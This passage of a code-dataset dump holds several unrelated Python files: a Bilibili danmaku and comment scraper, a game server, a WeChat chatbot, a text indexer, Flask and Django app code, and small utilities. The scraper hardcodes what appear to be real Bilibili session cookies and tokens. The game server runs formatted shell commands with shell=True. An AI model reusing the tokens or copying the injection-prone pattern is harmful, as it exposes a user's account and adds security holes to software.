'haipproxy:speed:weibo'\nSPEED_ZHIHU_QUEUE = 'haipproxy:speed:zhihu'\nSPEED_PHISHTANK_QUEUE = 'haipproxy:speed:phishtank'\n\n# squid settings on linux os\n# execute sudo chown -R $USER /etc/squid/ and\n# sudo chown -R $USER /var/log/squid/cache.log at first\nSQUID_BIN_PATH = '/usr/sbin/squid' # mac os '/usr/local/sbin/squid'\nSQUID_CONF_PATH = '/etc/squid/squid.conf' # mac os '/usr/local/etc/squid.conf'\nSQUID_TEMPLATE_PATH = '/etc/squid/squid.conf.backup' # mac os /usr/local/etc/squid.conf.backup\n\n# client settings\n# client picks proxies which's response time is between 0 and 5 seconds\nLONGEST_RESPONSE_TIME = 10\n# client picks proxies which's score is not less than 7\nLOWEST_SCORE = 7\n","sub_path":"haipproxy/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650770903","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.TocataAbiertaListView.as_view(), name='tocatasabiertas'),\n path('/', views.TocataAbiertaDetailView.as_view(), name='tocataabierta'),\n path('artista/mistocatasabiertas', views.TocatasAbiertasArtistaListView.as_view(), name='mistocatasabiertas'),\n path('artista/creartocataabierta', views.TocataAbiertaCreateView.as_view(), name='creartocataabierta'),\n path('artista/borrartocataabierta', views.BorrarTocataAbiertaView.as_view(), name='borrartocataabierta'),\n path('artista/suspendertocataabierta', views.SuspenderTocataAbiertaView.as_view(), name='suspendertocataabierta'),\n path('ajax/load-comunas_tocata/', views.carga_comunas_tocata, name='ajax_load_comunas_tocata'),\n]\n","sub_path":"tocataabierta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"57390836","text":"import os\nimport numpy as np\nimport subprocess\nfrom multiprocessing.pool import ThreadPool as Pool\n\n\nclass GoldenNumberServer(object):\n def __init__(self, players_bot_list):\n self.players_bot_list = players_bot_list\n self.scores = np.zeros(len(players_bot_list))\n self.history_str_head = '0\\t{}\\n'.format(1 + 2*len(players_bot_list))\n self.history_str_body = ''\n self.pool = Pool(processes=16)\n\n def run(self):\n # get all numbers from players\n numbers = np.reshape(np.array(self.pool.map(self._get_number, self.players_bot_list)), -1)\n\n golden_number = np.mean(numbers) * 0.618\n self._update_history_str(golden_number, numbers)\n errors = np.abs(golden_number - numbers)\n min_error = np.min(errors)\n max_error = np.max(errors)\n win_flags = (errors[0::2] == min_error) + (errors[1::2] == min_error)\n lose_flags = (errors[0::2] == max_error) + (errors[1::2] == max_error)\n self.scores[win_flags] += len(self.players_bot_list)\n self.scores[lose_flags] -= 2\n rank = np.argsort(-self.scores)\n\n return float(golden_number), numbers, win_flags, lose_flags, rank\n\n def _get_number(self, bot):\n std_in = self.history_str_head + self.history_str_body\n cur_path = os.path.abspath(os.path.dirname(__file__))\n cache_path = os.path.join(cur_path, 'cache.txt')\n with open(cache_path, 'w') as f:\n f.write(std_in)\n bot_out = subprocess.check_output('python {} < {}'.format(bot, cache_path),shell=True)\n bot_out = bot_out[:-1]\n bot_out = bot_out.decode()\n bot_out_number = np.array(bot_out.split('\\t')).astype(float)\n return bot_out_number\n\n def _update_history_str(self, golden_number, numbers):\n row_str, col_str = self.history_str_head.split('\\t')\n row_str = str(int(row_str) + 1)\n self.history_str_head = row_str + '\\t' + col_str\n self.history_str_body += '\\t'.join(np.concatenate(([golden_number], numbers)).astype(np.str)) + '\\n'\n\n def reset(self):\n self.scores = np.zeros(len(self.players_bot_list))\n self.history_str_head = '0\\t{}\\n'.format(1 + 2*len(self.players_bot_list))\n self.history_str_body = ''","sub_path":"env/golden_number_server.py","file_name":"golden_number_server.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"114320978","text":"import requests\nimport json\nimport re\nimport datetime\nimport bs4\nfrom tqdm import tqdm\nfrom avtobv import AvBv\nimport time\nimport pandas as pd\nimport os\nimport numpy as np\ncookies={}\nremove_chars = '[·’!\"\\#$%&\\'()#!()*+,-./:;<=>?\\@,:?¥★、….>【】[]《》?“”‘’\\[\\\\]^_`{|}~—◢—]+'\ndef format_cookie(cookie_str):\n cookies={}\n for line in cookie_str.split(';'):\n key,value=line.split('=')\n cookies[key]=value\n return cookies\ndef get_cid(bv):\n cid_url = f'https://api.bilibili.com/x/player/pagelist?bvid={bv}&jsonp=jsonp'\n res = requests.get(cid_url)\n res_text=res.text\n res_dict=json.loads(res_text)\n\n part_list = res_dict['data']\n new_part_list=[]\n for part in part_list:\n new_part={'cid':part.get('cid'),'part_name':part.get('part')}\n new_part_list.append(new_part)\n return new_part_list\ndef get_startday(bv):\n cid_url = f'https://www.bilibili.com/video/{bv}'\n res = requests.get(cid_url)\n res_html=res.text\n print(cid_url)\n #print(res.text)\n soup=bs4.BeautifulSoup(res_html,'lxml')\n mounth=soup.find('div',class_='video-data').find_all('span')[1].text.split(' ')[0]#.stripped_strings()\n\n aid=soup.find('meta',property='og:url')['content'].split('/')[-2].split('av')[-1]\n\n return aid,mounth\ndef get_aid(cid):\n aid_url=f'http://interface.bilibili.com/player?id=cid:{cid}'\n aid=requests.get(aid_url,cookies=cookies)\n print(aid_url)\n print(aid.text)\n return\ndef _get__one_month_data_list(cid,month):\n #https: // api.bilibili.com / x / v2 / dm / history / index?type = 1 & oid = 182435882 & month = 2020 - 04\n\n data_list_url = f'https://api.bilibili.com/x/v2/dm/history/index?type=1&oid={cid}&month={month}'\n res = requests.get(data_list_url,cookies=cookies)\n res_dict=json.loads(res.text)\n data_list=res_dict.get('data')\n return data_list\ndef _get_dan_mu_xml(cid,date):\n dan_mu_url = f'https://api.bilibili.com/x/v2/dm/history?type=1&oid={cid}&date={date}'\n res=requests.get(dan_mu_url,cookies=cookies)\n da_mu_xml=res.content.decode('utf8')\n #print(dan_mu_url)\n return da_mu_xml\ndef _parse_dan_mu(_get_dan_mu_xml):\n #print(_get_dan_mu_xml)\n reg=re.compile('([\\s\\S]+?)')\n\n find_result=reg.findall(_get_dan_mu_xml)\n\n dan_mu_list=[]\n for line in find_result:\n p,dan_mu=line\n dm_time=float(p.split(',')[0])\n\n time_stamp = int(p.split(',')[4])\n dm_type = int(p.split(',')[5])\n dm_id=p.split(',')[6]\n date_array=datetime.datetime.fromtimestamp(time_stamp)\n send_time=date_array.strftime('%Y-%m-%d %H:%M:%S')\n dan_mu_list.append([dm_time,send_time,dm_type,dm_id,dan_mu])\n return dan_mu_list\ndef get_status(bv):\n transorform=AvBv()\n aid=transorform.dec(bv)\n headers = {\n 'Host': 'api.bilibili.com',\n 'Referer': 'https://www.bilibili.com/video/av77413543',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'\n }\n info = f'https://api.bilibili.com/x/web-interface/archive/stat?aid={aid}'\n info_rsp = requests.get(url=info, headers=headers)\n info_json = info_rsp.json()\n info_data=info_json['data']\n return info_data\n\ndef get_view(bvid):\n headers = {\n 'Host': 'api.bilibili.com',\n 'Referer': 'https://www.bilibili.com/video/av77413543',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'\n }\n info =' https://api.bilibili.com/x/web-interface/view?bvid='+ bvid\n info_rsp = requests.get(url=info, headers=headers)\n info_json = info_rsp.json()\n info_data=info_json['data']\n return info_data\n\n\n\nclass language:\n def __init__(self):\n str=''\n with open('Enlist.txt',encoding='UTF8') as f :\n str=f.read()\n self.Endict=json.loads(str)\n #self.status_En=Endict['status']\n #print(self.status_En)\n def status_ENtoCn(self,str):\n status_En = self.Endict['status']\n En=str\n\n CN=status_En[En]\n return CN\n\n\ndef getAllCommentList(bv):\n transorform=AvBv()\n av=transorform.dec(bv)\n url = \"http://api.bilibili.com/x/reply?type=1&oid=\" + str(av) + \"&pn=1&nohot=1&sort=0\"\n info_list=[]\n filename=f'{bv}/{bv}_comment.csv'\n r = requests.get(url)\n numtext = r.text\n json_text = json.loads(numtext)\n commentsNum = json_text[\"data\"][\"page\"][\"count\"]\n page = commentsNum // 20 + 1\n #page=2\n for n in tqdm(range(1, page)):\n url = \"https://api.bilibili.com/x/v2/reply?jsonp=jsonp&pn=\" + str(n) + \"&type=1&oid=\" + str(av) + \"&sort=1&nohot=1\"\n req = requests.get(url)\n text = req.text\n json_text_list = json.loads(text)\n # for i in json_text_list[\"data\"][\"replies\"]:\n # #print([i[\"member\"][\"uname\"], i[\"content\"][\"message\"]])\n # info_list.append([i[\"member\"][\"uname\"], i[\"content\"][\"message\"],i['like']])\n get_replies(json_text_list[\"data\"],info_list,n)\n #info_list.append(json_text_list)\n tmp_df=pd.DataFrame(info_list,columns=['uname','sex','message','like','rpid','root','ctime','page'])\n tmp_df.to_csv(filename,index=False)\n return info_list\n\n\ndef get_replies(data,info_list,page):\n n=page\n if data['replies']==None:\n return\n else:\n for replies in data['replies']:\n info_list.append([replies[\"member\"][\"uname\"],replies[\"member\"][\"sex\"], replies[\"content\"][\"message\"], replies['like'],replies['rpid'],replies['root'],replies['ctime'],n])\n get_replies(replies, info_list,n)\n\n# def get_replies(data,info_list):\n# for replies in data['replies']:\n# info_list.append([replies[\"member\"][\"uname\"], replies[\"content\"][\"message\"], replies['like'],replies['rpid'],replies['root'],replies['ctime']])\n# get_replies(replies, info_list)\n\n\ndef get_data_history(cid_data_list,pubdate,nowdate):\n date_history_list=[]\n\n for cid_item in cid_data_list:\n # print(time.strftime(\"%Y--%m--%d %H:%M:%S\", pudtime))\n # print(time.strftime(\"%Y--%m--%d %H:%M:%S\", now))\n #now = datetime.date.today()\n now= datetime.datetime.now()\n #nowdate=time.time()\n #now=time.localtime(nowdate)\n pudtime =datetime.datetime.fromtimestamp(pubdate)\n year = now.year\n month = now.month\n #print(now)\n start_year = pudtime.year\n start_mounth = pudtime.month\n #pre_month_last_day = now.date()\n pre_month_last_day = now.date()\n while pre_month_last_day>pudtime.date():\n one_month_date_list = _get__one_month_data_list(cid_item['cid'],f'{year}-{month:>02}')\n print(one_month_date_list)\n if one_month_date_list:\n cid_item['date_list']=cid_item.get('date_list',[])\n cid_item['date_list'].extend(one_month_date_list)\n this_month_first_day=datetime.date(year,month,1)\n #print(this_month_first_day)\n pre_month_last_day=this_month_first_day-datetime.timedelta(days=1)\n year=pre_month_last_day.year\n month=pre_month_last_day.month\n date_history_list.append(cid_item)\n return date_history_list\n\n\ndef get_all_dan_mu(data_historry_list,bv):\n for item in data_historry_list:\n part_name = item.get('part_name')\n filename = bv\n if part_name:\n filename=f'{bv}_{part_name}'\n with open(f'{filename}.txt','w',encoding='utf8') as f:\n for date in tqdm(item['date_list']):\n dan_mu_xml=_get_dan_mu_xml(item['cid'],date)\n dan_mu_list=_parse_dan_mu(dan_mu_xml)\n #print(dan_mu_list[0])\n for dan_mu_item in dan_mu_list:\n line = '<;>'.join(dan_mu_item)\n f.writelines(line)\n f.write('\\n')\n\ndef get_all_dan_mu_new(data_historry_list,bv):\n for item in data_historry_list:\n #print(item)\n part_name = item.get('part_name')\n part_name=part_name.replace('.','_')\n filename = bv\n all_dm_list=[]\n if part_name:\n filename=f'{bv}_{part_name}.csv'\n #with open(f'{filename}.txt','w',encoding='utf8') as f:\n for date in tqdm(item['date_list']):\n dan_mu_xml=_get_dan_mu_xml(item['cid'],date)\n dan_mu_list=_parse_dan_mu(dan_mu_xml)\n all_dm_list.extend(dan_mu_list)\n #print(dan_mu_list[0])\n # for dan_mu_item in dan_mu_list:\n # line = '<;>'.join(dan_mu_item)\n # f.writelines(line)\n # f.write('\\n')\n df=pd.DataFrame(all_dm_list,columns=['time','sendtime','dmtype','id','content'])\n df.to_csv(f'{bv}/{filename}', index=False)\n\nif __name__ == '__main__':\n a=language()\n\n bv=\"BV1VD4y1D788\"\n #bv='BV1w64y1c7Gb'\n dirs=f'{bv}'\n if not os.path.exists(dirs):\n os.makedirs(f'{dirs}')\n\n cookie_str=\"\"\"CURRENT_FNVAL=16; _uuid=38285B20-6C3C-34A8-744A-B823DDF01C2C48839infoc; buvid3=2978B47B-C905-47F9-8D8A-4AC344F02378155816infoc; DedeUserID=4348911; DedeUserID__ckMd5=6ace9c7a6f620f59; SESSDATA=9b4d7c1a%2C1607260982%2C844d4*61; bili_jct=a6fbb288df0ecb23bb10c8d57664e0e5; LIVE_BUVID=AUTO5815917089829153; rpdid=|(k)~u~)lmmY0J'ulmkm|JJ)Y; PVID=4; sid=5suetco3\"\"\"\n cookies = format_cookie(cookie_str)\n cid_data_list=get_cid(bv)\n view=get_view(bv)\n print(view)\n aid=view['stat']['aid']\n pubdate=view['pubdate']\n now_date=view['ctime']\n name=view['title']\n #get_aid(cid_data_list[0]['cid'])\n #aid,start_day=get_startday(bv)\n data_historry_list=get_data_history(cid_data_list,pubdate,now_date)\n print(data_historry_list)\n # view=getAllCommentList(bv)\n # print(view)\n #print(data_historry_list)\n getAllCommentList(bv)\n get_all_dan_mu_new(data_historry_list,bv)","sub_path":"app/dmscripy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"16162961","text":"# https://www.reddit.com/r/dailyprogrammer/comments/8s0cy1/\nimport random\n\n\ndef main():\n # IDK why I did this.\n def num_as_word(num):\n num_words = [\"zero\", \"one\", \"two\", \"three\", \"four\", \"five\",\n \"six\", \"seven\", \"eight\", \"nine\", \"ten\"]\n return num if num > 10 else num_words[num]\n separator = 'd'\n help_str = f\"Dice Roller!\\nInput format like '2{separator}6'\"\n help_str2 = \"Cannot roll less than 1 die, cannot roll less than a d2.\"\n\n # Start program\n print(help_str)\n while True:\n input_str = input(\"> \")\n split_input = input_str.partition(separator)\n\n # First check that it found the separator and the other characters are numbers\n if split_input[1] is separator and (split_input[0].isnumeric() and split_input[2].isnumeric()):\n count, _, die = split_input\n count = int(count)\n die = int(die)\n # print error for invalid rolls\n if count < 1 or die < 2:\n print(help_str2)\n continue\n print(f\"Rolling {num_as_word(count)} {num_as_word(die)}-sided {'die' if count == 1 else 'dice'}: \")\n result = 0\n rolls_list = []\n for _ in range(count):\n roll = random.randint(1, die)\n result += roll\n rolls_list.append(roll)\n print(f\"{rolls_list} = {result}\")\n else:\n print(help_str)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dailyprogrammer/diceroller.py","file_name":"diceroller.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"143930633","text":"\n\n#calss header\nclass _REIN():\n\tdef __init__(self,): \n\t\tself.name = \"REIN\"\n\t\tself.definitions = [u'a long, thin piece of material, especially leather, that helps you to control and direct a horse: ', u\"a strap that is put around a small child's body or wrist and held at the other end by an adult so that the adult can stop the child running away: \"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_rein.py","file_name":"_rein.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272008802","text":"\ncontent_dict = {}\n\n\nfile = open('../given_resources/cacm_stem.txt','rU') \nfor line in file:\n if line[0] == '#':\n i = line.split()[1]\n content_dict['CACM-'+str(i).zfill(4)] = ''\n \n else:\n content_dict['CACM-'+str(i).zfill(4)] += line+' '\n \n\n\n# given a integer n\n# returns index of word n gram\ndef make_index_n():\n index = {}\n doc_length_dict = {}\n for file_name in content_dict:\n doc_length_dict[file_name] = len(content_dict[file_name].split())\n print(\"Processing : \"+file_name)\n term_freq_in_doc = {}\n \n word_list = content_dict[file_name].split()\n word_list = filter_ascii(word_list)\n\n for word in word_list:\n if word in term_freq_in_doc.keys():\n term_freq_in_doc[word] += 1\n else:\n term_freq_in_doc[word] = 1\n \n for key in term_freq_in_doc.keys():\n did_freq = [file_name, term_freq_in_doc[key]]\n if key in index.keys():\n index[key].append(did_freq)\n else:\n index[key] = [did_freq]\n save_index(index, doc_length_dict)\n print('Index Created')\n\n\n# given index and integer n\n# saves the index\ndef save_index(i,j):\n fw = open('../index_stemmed' + '.txt', 'w', encoding='utf-8')\n fw.write(str(i))\n fw.close()\n\n file = open('../docs_length_stemmed.txt','w')\n file.write(str(j))\n file.close()\n\n# given a string s\n# return true if string contains ascii characters\ndef is_english(s):\n try:\n s.encode(encoding='utf-8').decode('ascii')\n except UnicodeDecodeError:\n return False\n else:\n return True\n\n\n# given list of strings\n# return all string that can be encoded through ascii\ndef filter_ascii(words):\n word_list = []\n for word in words:\n if is_english(word):\n word_list.append(word)\n\n return word_list\n\n\nmake_index_n()","sub_path":"resources/source_code/indexer_stemmed.py","file_name":"indexer_stemmed.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"454635816","text":"# coding: utf-8\n\n\"\"\"\n\n ~~~~~~~~~~\n\n :author Skyduy \n\n\"\"\"\nfrom __future__ import unicode_literals\n\nimport random\nfrom random import randint\nfrom WeChat.config import filter_path\nfrom text_filter import DFAFilter\nfrom utils import HandlerRedisDB0, HandlerRedisDB1, HandlerMySQL\n\n\ndef get_text_reply(message):\n \"\"\"\n :param message: 文本消息对象,有以下属性\n id: 消息ID\n target: 消息目的者, 即本服务器\n source: 消息源, 即发送者\n time: 消息发送时间\n content: 消息文本内容\n :return: 文本消息\n \"\"\"\n source = message.source\n handler_redis0 = HandlerRedisDB0(source)\n handler_redis1 = HandlerRedisDB1()\n handler_sql = HandlerMySQL(source)\n text_filter = DFAFilter(filter_path)\n content = message.content.strip()\n handler_redis0.active_daily()\n if content == '':\n return '?'*randint(1, 5)\n state = handler_redis0.get_state()\n instruction = ['学习', '帮助', '段子', '我的豆子', '你是谁']\n if state == '0':\n if content in instruction:\n if content == '学习':\n handler_redis0.chg_state()\n return '输入问题:'\n elif content == '帮助':\n content = '小D有如下指令:\\n1、学习\\n2、段子\\n3、我的豆子\\n4、帮助\\n向小D发送即可执行'\n return content\n elif content == '你是谁':\n content = '这是一个开源的并没有什么技术含量的聊天机器人\\n' \\\n '你可以在这里找到源代码: https://github.com/skyduy/wechat\\n' \\\n '如果你在搭建或继续开发的过程中遇到什么问题,可以直接发邮件到 cuteuy@gmail.com'\n return content\n elif content == '我的豆子':\n balance = handler_redis0.get_money()\n return '你还剩%s颗豆子~\\n·教小D知识+10豆\\n·和小D聊天+1豆' % balance\n elif content == '段子':\n joke, rank = handler_redis0.get_joke_rank()\n if joke == '':\n return '库存没有段子了!管理员正在运货!'\n rank = int(rank)\n if not handler_redis0.has_read():\n reductions = 1 if 31 <= rank <= 40 else 2 if 26 <= rank <= 30 else \\\n 4 if 23 <= rank <= 25 else 8 if 21 <= rank <= 22 else 0\n enough, balance = handler_redis0.reduce_money(reductions)\n if not enough:\n return '你仅剩颗%s个豆子,不能购买价值%s的段子了, 回复\"学习\"教我知识吧,能赚豆子哦!' \\\n % (balance, reductions)\n elif rank > 21:\n fee = '付费'\n num = rank - 20\n tip = '[你购买了价值%s豆的段子,还剩下%s颗豆子]' % (reductions, balance)\n elif rank == 21:\n fee = '付费'\n num = rank - 20\n tip = '[你购买了价值%s豆的最后一餐付费段子,还剩下%s颗豆子,接下来的20个段子免费哦]' % \\\n (reductions, balance)\n elif rank > 1:\n fee = '免费'\n num = rank\n tip = '[本条为免费段子~]'\n else:\n fee = '免费'\n num = rank\n tip = '[今天的段子讲完啦~不过可以重温讲给女票!(重温免费)]'\n handler_redis0.read_over()\n content = '今日%s段子[%s]:\\n%s\\n\\n%s' % (fee, str(num), joke, tip)\n else:\n tip = '\\n[此条为免费重温段子,每日更新]'\n content = '今日段子[%s]:\\n%s\\n\\n%s' % (str(rank), joke, tip)\n handler_redis0.chg_joke_rank()\n return content\n else:\n handler_sql.add_chat_record(content)\n handler_redis0.add_money()\n ids = handler_redis1.id_from_redis(content)\n if not ids:\n return '该问题还没人教呢!回复“学习”教教小D吧!'\n qa_id = random.choice(ids)\n answer = handler_sql.get_answer_by_id(qa_id)\n if answer is None:\n return '该问题还没人教呢!回复“学习”教教小D吧!'\n return answer\n\n if state == '1':\n if content in instruction:\n return '指令无法作为问题,请重新输入其他问题。'\n else:\n handler_redis0.add_question(content)\n handler_redis0.chg_state()\n return '对于问题:%s\\n输入其答案:' % content\n\n if state == '2':\n handler_redis0.chg_state()\n question = handler_redis0.get_question()\n if not question:\n return '呜...小D只知道你在一小时或者更久之前问过问题,但是忘记问题是什么了...'\n\n if text_filter.included_in(content):\n handler_sql.add_sensitive_qa(question, content)\n return '(#゚Д゚)!小D检测到您的回答中有敏感词汇,学习失败。'\n else:\n qa_id = handler_sql.add_valid_qa(question, content)\n handler_redis0.add_money(10)\n handler_redis1.content_to_redis(question, qa_id)\n return '问题:%s\\n答案:%s\\n学习成功:)' % (unicode(question, 'utf-8'), content)\n","sub_path":"WeChat/handlers/wechat_reply.py","file_name":"wechat_reply.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519033402","text":"from __future__ import print_function, division\nimport os\nimport pandas as pd\nimport time\nimport sox\n\n# \n# \n# Zero-pads and trims all audio files to match the versions used in SALAMI.\n# \n# \n\nmatchlist_csv_filename = os.getcwd() + \"/salami_youtube_pairings.csv\"\ndownloaded_audio_folder = os.getcwd() + \"/downloaded_audio\"\ntransformed_audio_folder = os.getcwd() + \"/transformed_audio\"\n\n# Specify location of downloaded audio\n\ndownloaded_audio_folder = os.getcwd() + \"/downloaded_audio\"\nif not os.path.exists(downloaded_audio_folder):\n\tos.makedirs(downloaded_audio_folder)\n\nif not os.path.exists(transformed_audio_folder):\n\tos.makedirs(transformed_audio_folder)\n\ndef reshape_audio(salami_id, match_data):\n\trow = {colname: match_data[colname][match_data.salami_id==salami_id].values[0] for colname in match_data.columns}\n\tinput_filename = downloaded_audio_folder + \"/\" + str(row[\"youtube_id\"]) + \".mp3\"\n\toutput_filename = transformed_audio_folder + \"/\" + str(row[\"salami_id\"]) + \".mp3\"\n\tstart_time_in_yt = row[\"onset_in_youtube\"] - row[\"onset_in_salami\"]\n\t# = - row[\"time_offset\"]\n\tend_time_in_yt = start_time_in_yt + row[\"salami_length\"]\n\ttfm = sox.Transformer()\n\tif end_time_in_yt > row[\"youtube_length\"]:\n\t\ttfm.pad(end_duration=end_time_in_yt - row[\"youtube_length\"])\n\tif start_time_in_yt < 0:\n\t\ttfm.pad(start_duration=-start_time_in_yt)\n\t\tstart_time_in_yt = 0\n\t# Select portion of youtube file to match salami\n\ttfm.trim(start_time_in_yt, start_time_in_yt+row[\"salami_length\"])\n\ttfm.build(input_filename, output_filename)\n\nif __name__ == \"__main__\":\n\tmatch_data = pd.read_csv(matchlist_csv_filename, header=0)\n\tmatch_data = match_data.fillna(\"\")\n\tfor ind in match_data.index:\n\t\ttry:\n\t\t\treshape_audio(match_data.salami_id[ind], match_data)\n\t\t\ttime.sleep(2)\n\t\texcept (KeyboardInterrupt):\n\t\t\traise\n\t\texcept:\n\t\t\tprint(\"Error while attempting to process row {0}: {1} (salami_id {2}).\".format(ind,match_data.youtube_id[ind],match_data.salami_id[ind]))\n","sub_path":"align_audio.py","file_name":"align_audio.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"260018174","text":"import PySimpleGUI as sg\nfrom .view import View\n\n\nclass ViewCadastroCurso(View):\n\n def __init__(self):\n pass\n\n def rodar(self, window, erro):\n if erro:\n window.Element(\"invalid_field\").Update(\n f\"Campo inválido: {erro}\", visible=True)\n while True:\n event, values = window.read()\n if event == \"Enviar\":\n window.Element(\"invalid_field\").Update(visible=False)\n\n return self.voltar(result=values)\n if event == \"Voltar\" or event == sg.WIN_CLOSED:\n return self.voltar(view=window)\n\n def comecar(self, erro=None, **kwargs):\n layout = [\n [sg.Text(\"Cadastro de Curso\")],\n [sg.Text(\"\", size=(50, 2), key=\"invalid_field\", visible=False)],\n [sg.Text(\"Nome do Curso\", size=(20, 1)),\n sg.Input(key=\"nome_curso\", default_text=kwargs.setdefault(\"nome_curso\"))],\n [sg.Text(\"Link do Curso\", size=(20, 1)),\n sg.Input(key=\"link_curso\", default_text=kwargs.setdefault(\"link_curso\"))],\n [sg.Text(\"Preço do Curso\", size=(20, 1)),\n sg.Input(key=\"preco_curso\", default_text=kwargs.setdefault(\"preco_curso\"))],\n [sg.Submit(\"Enviar\")],\n [sg.Button(\"Voltar\")]\n ]\n window = sg.Window(\"Cadastro de Curso\", layout=layout,\n element_justification='c').Finalize()\n result = self.rodar(window, erro)\n window.close()\n return result\n","sub_path":"view/viewCadastroCurso.py","file_name":"viewCadastroCurso.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"34510798","text":"from flask import render_template, redirect, url_for, abort, request\nfrom ..models import User, Pitch, Comments, PitchCategory, Votes\nfrom flask_login import login_required, current_user \nfrom .forms import PitchForm, CommentForm, UpdateProfile, CategoryForm\nfrom .. import db, photos\nfrom . import main\n\n\n@main.route ('/')\ndef index():\n \"\"\"\n Function that returns index page and data\n \"\"\"\n category = PitchCategory.get_categories()\n return render_template('index.html', categories = category)\n\n@main.route('/category/new-pitch/', methods= ['GET', 'POST'])\n@login_required\ndef new_pitch(id):\n \"\"\"\n Function to fetch data \n \"\"\"\n form = PitchForm()\n category = PitchCategory.query.filter_by(id=id).first()\n\n if category is None:\n abort(404)\n \n if form.validate_on_submit():\n pitch = form.pitch.data\n new_pitch = Pitch(pitch = pitch, category_id = category.id, user_id= current_user.id)\n new_pitch.save_pitch()\n \n\n return redirect(url_for('.category', id= category.id))\n \n return render_template('new_pitch.html', pitch_form = form, category = category) \n\n@main.route ('/categories/')\n@login_required\ndef category(id):\n category = PitchCategory.query.get(id)\n if category is None:\n abort (404)\n \n pitches = Pitch.get_pitches(id)\n \n return render_template ('category.html', pitches = pitches, category= category)\n\n\n@main.route('/add/category', methods = ['GET', 'POST'])\n@login_required\ndef new_category():\n form = CategoryForm()\n \n if form.validate_on_submit():\n name = form.name.data\n new_category = PitchCategory(name=name)\n new_category.save_category()\n \n db.session.add(new_category)\n db.session.commit()\n return redirect(url_for('.index'))\n title = 'New Category' \n return render_template('post_comment.html', comment_form = form, title = title) \n\n@main.route('/view/', methods = ['GET', 'POST'])\n@login_required\ndef view_pitch(id):\n \"\"\"\n Function that returns a single pitch with comments\n \"\"\"\n print(id)\n pitches = Pitch.query.get(id)\n if pitches is None:\n abort(404)\n \n comment = Comments.get_comments(id)\n title = 'View Pitch'\n return render_template('view.html', pitches= pitches, comment = comment, category_= id, title= title)\n\n@main.route('/write_comment/', methods=['GET', 'POST'])\n@login_required\ndef post_comment(id):\n \"\"\"\n Fuction to add comments\n \"\"\"\n form = CommentForm()\n title = \"Add a comment\"\n pitches = Pitch.query.filter_by(id=id).first()\n\n if form.validate_on_submit():\n comment = form.comment.data\n new_comment = Comments(comment=comment, user_id=current_user.id, pitches_id=pitches.id)\n new_comment.save_comment()\n return redirect(url_for('.view_pitch', id=pitches.id))\n\n return render_template('post_comment.html', comment_form=form, title=title)\n\n@main.route('/user/')\n@login_required\ndef profile(uname):\n user = User.query.filter_by (username = uname).first()\n \n if user is None:\n abort(404)\n \n return render_template('profile/profile.html', user = user)\n\n@main.route('/user//update', methods = ['GET', 'POST'])\n@login_required\ndef update_profile(uname):\n user = User.query.filter_by (username = uname).first()\n if user is None:\n abort(404)\n \n form = UpdateProfile()\n if form.validate_on_submit():\n user.bio = form.bio.data\n db.session.add(user)\n db.session.commit()\n \n return redirect(url_for('.profile', uname = user.user))\n return render_template('profile/update.html', form = form)\n\n@main.route('/user//update/pic',methods= ['POST'])\n@login_required\ndef update_pic(uname):\n user = User.query.filter_by(username = uname).first()\n if 'photo' in request.files:\n filename = photos.save(request.files['photo'])\n path = f'photos/{filename}'\n user.profile_pic_path = path\n db.session.add(user)\n db.session.commit()\n return redirect(url_for('main.profile',uname=uname))\n\n# voting\n@main.route('/pitch/upvote/')\n@login_required\ndef upvote(id):\n '''\n View function that add one to the vote_number column in the votes table\n '''\n pitch_id = Pitch.query.filter_by(id=id).first()\n\n if pitch_id is None:\n abort(404)\n\n new_vote = Votes(vote=int(1), user_id=current_user.id, pitches_id=pitch_id.id)\n new_vote.save_vote()\n return redirect(url_for('.view_pitch', id=id))\n\n\n\n@main.route('/pitch/downvote/')\n@login_required\ndef downvote(id):\n pitch_id = Pitch.query.filter_by(id=id).first()\n\n new_vote = Votes(vote=int(2), user_id=current_user.id, pitches_id=pitch_id.id)\n new_vote.save_vote()\n return redirect(url_for('.view_pitch', id=id))\n\n@main.route('/pitch/downvote/')\n@login_required\ndef vote_count(id):\n\n votes = Votes.query.filter_by(user_id=current_user.id).all()\n\n total_votes = votes.count()\n\n return total_votes\n\n@main.route('/like//')\n@login_required\ndef like_action(comment_id, action):\n comment = Comment.query.filter_by(id=post_id).first_or_404()\n if action == 'vote':\n current_user.vote_comment(comment)\n db.session.commit()\n if action == 'downvote':\n 